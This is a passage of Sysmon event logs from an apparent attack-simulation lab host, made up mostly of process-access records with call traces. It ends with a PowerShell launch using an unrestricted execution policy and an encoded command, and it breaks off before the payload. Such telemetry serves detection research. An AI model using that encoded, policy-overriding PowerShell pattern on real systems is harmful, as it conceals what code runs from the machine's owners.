596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.443","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4959,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.443\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.443","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4960,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.443\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.443","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4961,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.443\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.443","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4962,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.443\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.443","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4963,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.443\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.443","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4964,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.443\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.443","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4965,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.443\r\nSourceProcessGUID: {E2A3D6B1-11C4-5F25-0000-001043D90600}\r\nSourceProcessId: 4776\r\nSourceThreadId: 1092\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11C4-5F25-0000-001098DB0600}\r\nTargetProcessId: 1348\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.443","SourceProcessGUID":"{E2A3D6B1-11C4-5F25-0000-001043D90600}","SourceProcessId":"4776","SourceThreadId":"1092","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11C4-5F25-0000-001098DB0600}","TargetProcessId":"1348","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4966,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.460\r\nProcessGuid: {E2A3D6B1-11C4-5F25-0000-001067DC0600}\r\nProcessId: 1164\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 